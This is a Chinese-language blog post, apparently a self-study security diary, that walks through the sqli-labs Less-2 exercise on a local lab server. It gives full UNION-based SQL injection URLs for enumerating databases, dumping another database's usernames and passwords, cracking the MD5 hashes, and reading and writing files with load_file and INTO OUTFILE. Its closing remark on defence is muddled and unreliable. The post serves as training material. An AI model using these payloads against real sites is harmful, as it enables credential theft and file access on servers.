【网安自学/web漏洞-day02】sqli-labs第二关(改为跨站注入)

查询注入点与第一题不一样,其他都一样,所以试一试跨站注入

若一个网页的注入点使用的是root用户,那么可以使用这个注入点跨库查询其他的数据库。

例如:;使用sqil-labs root用户注入进行跨库攻击:

  1. 在网站后添加id=1发现显示用户名
    1. 【网安自学/web漏洞-day02】sqli-labs第二关(改为跨站注入)_第1张图片

     

  2. 判断是否是字符注入 http://127.0.0.1/sqli-labs/Less-2/?id=1’
    1. 【网安自学/web漏洞-day02】sqli-labs第二关(改为跨站注入)_第2张图片

     

  3. 根据报错类型判断可能是int类型:http://127.0.0.1/sqli-labs/Less-2/?id=1 and 1=1
    1. 【网安自学/web漏洞-day02】sqli-labs第二关(改为跨站注入)_第3张图片
    2. 1=2时找不到用户了http://127.0.0.1/sqli-labs/Less-2/?id=1 and 1=2
      • 【网安自学/web漏洞-day02】sqli-labs第二关(改为跨站注入)_第4张图片

       

     

  4. 跨库注入的思路
    1. 找到所有的数据库名 #information_schema(它记录了库名以及表名、列名)
  5. 查询有几列 http://127.0.0.1/sqli-labs/Less-2/?id=1 order by 4(报错)
    1. 【网安自学/web漏洞-day02】sqli-labs第二关(改为跨站注入)_第5张图片

     

  6. Order by 3的时候就不报错了 http://127.0.0.1/sqli-labs/Less-2/?id=1 order by 3
    1. 【网安自学/web漏洞-day02】sqli-labs第二关(改为跨站注入)_第6张图片

     

  7. 查询显示位 http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,3
    1. 【网安自学/web漏洞-day02】sqli-labs第二关(改为跨站注入)_第7张图片

     

  8.  查看当前数据库的用户,发现是root,则可以进行跨库攻击 http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,user(),null
    1. 【网安自学/web漏洞-day02】sqli-labs第二关(改为跨站注入)_第8张图片

     

  9. 查找数据库的所有数据 http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,group_concat(schema_name),null from information_schema.schemata
    1. 找到了另一个数据库pikachu

    1. 【网安自学/web漏洞-day02】sqli-labs第二关(改为跨站注入)_第9张图片

     

  1. 查询pikachu下的表名信息
    1. 查询到有以下表:httpinfo,member,message,users,xssblind
    2. 【网安自学/web漏洞-day02】sqli-labs第二关(改为跨站注入)_第10张图片

     

  2. 查找pikachu下面的users表(注意加上table_schema='pikachu'——指向数据库pikachu) http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,group_concat(column_name),null from information_schema.columns where table_name='users' and table_schema='pikachu'
    1. 【网安自学/web漏洞-day02】sqli-labs第二关(改为跨站注入)_第11张图片

     

  3. 查询username与password http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,username,password from pikachu.users
    1. 【网安自学/web漏洞-day02】sqli-labs第二关(改为跨站注入)_第12张图片

     

  4. 对密码进行md5解密:
    1. 【网安自学/web漏洞-day02】sqli-labs第二关(改为跨站注入)_第13张图片

     

  1. 文件读写操作(危!!!)
    1. load_file(): 读取函数
    2. Into outfile或into dumpfile: 导出函数
  2. 若已知某个盘有某个文件(通过扫描获得,那么就可以直接读取)--(例如已知d盘有version.txt)就能进行读取 http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,load_file('d:/version.txt'),null
    1. 【网安自学/web漏洞-day02】sqli-labs第二关(改为跨站注入)_第14张图片

     

  3. 为d盘下添加一个为“mytest”的“mytest.txt”文件 http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,'mytest',3 into outfile 'd:\\mytest.txt' %23
    1. 【网安自学/web漏洞-day02】sqli-labs第二关(改为跨站注入)_第15张图片
    2. 成功
      • 【网安自学/web漏洞-day02】sqli-labs第二关(改为跨站注入)_第16张图片

       

     

  4. Sql注入防护:魔术引导(把想写入的地址使用hex编码)

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        

你可能感兴趣的:(sqli-labs,数据库,安全,web安全)